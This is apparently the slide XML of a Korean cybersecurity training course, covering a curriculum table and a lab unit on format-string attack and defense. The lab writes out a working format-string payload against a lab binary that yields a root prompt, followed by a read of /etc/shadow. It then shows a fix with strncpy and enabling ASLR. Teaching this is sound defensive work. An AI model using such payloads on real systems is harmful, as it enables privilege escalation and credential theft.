                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1636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5970" marR="35970" marT="9945" marB="99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298682"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="397459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argv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[1]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포함된 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%08x’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의해 스택의 값을 하나씩 읽어온다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970" marR="35970" marT="9945" marB="99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119481"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66562" name="_x617086400">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B2B15A9-8D12-412B-A71B-F57674F3A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154" y="975147"/>
            <a:ext cx="480377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1" name="_x617086688">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07057C53-AA77-404F-B1EB-DB62815F0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08" y="975147"/>
            <a:ext cx="480377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601F245-3D40-4C1F-8FEB-C8D2C9432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185702"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6284887" y="437382"/>
          <a:ext cx="5381390" cy="4204921"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5381390">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3880889392"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1636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35970" marR="35970" marT="9945" marB="99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298682"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="397459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5970" marR="35970" marT="9945" marB="994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119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302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781E677B-FFEB-44EC-B488-2C8509CC9B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7048151"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1329855" y="1690688"/>
          <a:ext cx="9532293" cy="4678807"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="524875">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2798934004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2728070">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="378963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3764395784"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="378963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2836996947"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="378963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="16998547"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="378963">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1136910723"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="503879">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4160869444"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2605081">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4058845554"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="413634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="893576538"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="413634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3523855238"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="413634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2126082654"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="413634">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="642794511"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid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링크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교육내용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선행학습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링크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교육내용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선행학습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706695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2" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T1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사이버전 실습체계 구조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T19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네트워크 패킷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611002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3" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>T2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리눅스 기본 명령어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T20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ARP Spoofing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651176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리눅스 파일 시스템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T21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IP Spoofing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133713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리눅스 시스템 보안로그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T22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DNS Spoofing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401460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리눅스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R-command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T23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SYN Flooding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518544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Tshark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, Wireshark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T24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Ping Of Death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12555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메모리 구조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T25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Slowloris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Attack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318716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Vi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편집기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T26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SQL Injection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19258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버퍼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오버플로우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(Buffer Overflow)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T27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인증 및 세션 관리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319792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T10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디어셈블러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Objdump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T28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CSRF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527480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T11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디버거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(GDB)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사용법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T29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암호 알고리즘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915602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T12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쉘코드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(Shell Code)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401317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T13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힙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오버플로우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(Heap Overflow)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3178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T14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포맷스트링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(Format String Bug)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429381"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1970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T15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레이스 컨디션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(Race Condition)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025535"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1477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T16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백도어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(Backdoor)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202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T17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네트워크 서비스 종류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482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T18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SSL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통신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840533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FB783FB6-F004-4D8A-9A51-99B6118E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이론</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="rId4" action="ppaction://hlinksldjump"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4940BB54-D4E6-4689-9291-3F6BA3ACED57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4862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6) pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수 조작 시도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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print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     "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08n“’)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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>76</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 변경됨을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9C2C54A-5F0A-496C-967B-013EAF2B9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192320"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="488831" y="475102"/>
          <a:ext cx="5379232" cy="4158107"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5379232">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2547091076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660690"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="391185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위의 예제에서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snprintf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진입 시의 스택 구조는 다음과 같다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24917"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67585" name="_x618891432">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CDE8608-6A28-4B63-89D9-FDF1DFFEA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98" y="993484"/>
            <a:ext cx="480377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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D4CBBE-FD7A-4F02-AAEB-6ADC28FB1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31" y="5331422"/>
            <a:ext cx="4982591" cy="7230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3B88285-BDAF-4E0F-89EA-AE9333135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382142"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="481834"/>
          <a:ext cx="5386032" cy="4164940"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5386032">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3481946896"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23268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066711"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="391868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위의 예제에서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snprintf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진입 시의 스택 구조는 다음과 같다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939432"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67587" name="_x1659517408">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39DFB036-1896-41D8-BB25-802AF9721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652" y="993484"/>
            <a:ext cx="4803775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3099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7) pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 되도록 공격 및 루트 권한으로 실행할 명령 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>입력창</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print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    "\xa0\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x.%76x.%08n“’)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pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변수의 값이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 변경되어 루트 권한으로 명령을 실행시킬 수 있는 프롬프트가 등장</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 권한이 필요한 명령 실행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cat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/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 126">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6589769-D3DB-461C-9422-07580D150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782" b="9246"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479404" y="1085425"/>
            <a:ext cx="5442227" cy="1318996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A4B83F5-6C76-4AE9-A33C-D8DEA8F45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533322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317137" y="462566"/>
          <a:ext cx="5352566" cy="4151376"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5352566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="560903819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666905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="390512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위의 예제에서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snprintf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진입 시의 스택 구조는 다음과 같다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962474"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68609" name="_x617371528">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C24BBB6-4DE7-4678-BAA1-C8F9247FB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543" y="1003287"/>
            <a:ext cx="4803775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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6BA5BDA-2224-416F-B4ED-57AC93DA51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63142" r="30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6317137" y="5154663"/>
            <a:ext cx="4981050" cy="10215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212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A8A66-0FC4-40A5-BC51-C1EA3C9110D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="356331"/>
            <a:ext cx="5616792" cy="612000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다시 공격을 실시하여 루트 권한 쉘 획득 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>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acheck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699609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보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DE520DA-B504-4C1C-8096-919BFF01D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hlinkClick r:id="rId3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/Training/Unit/Sys/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. Format String </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>대응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/sec/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fmstring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파일에는 포맷 스트링 취약점이 존재한다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해당 취약점을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조치하시오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test / test123</a:t>
            </a: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 삭제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rm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BD3A2F5-6F8D-463B-9CA5-E4E12BE65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E53C2E-B931-4F95-9DFB-30866880C268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포맷 스트링 취약점을 이용한 공격을 수행할 수 있다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포맷 스트링 공격에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C1D8E86-851C-4874-937A-9DD64EA82A87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9FCFC1C-5E87-435E-B4F3-DB0D38C6C5C6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21" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{721C875A-961A-4C72-8951-8799030E4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74241C0-E0AC-4A46-BB1D-8FAFA9A8B54F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(CentOS 5.5)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72127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test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>계정으로 전환 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>디렉터리 이동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su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> test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cd /sec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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 명령을 입력하여 루트 권한으로 명령을 실행할 수 있음을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./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> $(python -c 'print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    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"\xa0\</a:t>
            </a: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xea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\</a:t>
            </a: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xff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\</a:t>
            </a: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xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>"+“%08x.%08x.%08x.%08x.%08x.%08x.%08x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.%76x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.%08n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>“’)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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 권한이 필요한 명령 실행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cat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/shadow</a:t>
            </a:r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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>루트 계정으로 복귀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exit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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>소스 코드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vi /sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수 사용으로 포맷 스트링 취약점이 존재함을 확인</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 130">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71289408-266B-4678-95B9-C39EDF85F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52" y="1729482"/>
            <a:ext cx="4877816" cy="126822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132">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3280749-911A-45C3-8C2E-C33736B18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52" y="3621892"/>
            <a:ext cx="4954016" cy="2797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34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{208F48A0-69F8-402A-952F-CA7A5DE027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9" t="-234" r="863" b="753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308408" y="1284923"/>
            <a:ext cx="4852987" cy="26717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80140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6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>취약한 부분 수정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 코딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff));</a:t>
            </a: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ko-KR" sz="1000" dirty="0"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>재빌드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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>getRoot.o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7) ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>활성화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sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>kernel.randomize_va_space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>=2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395154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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 139">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5C04B0-1A90-499C-B432-34A9F9351D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4" t="833" r="930" b="605"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="875348"/>
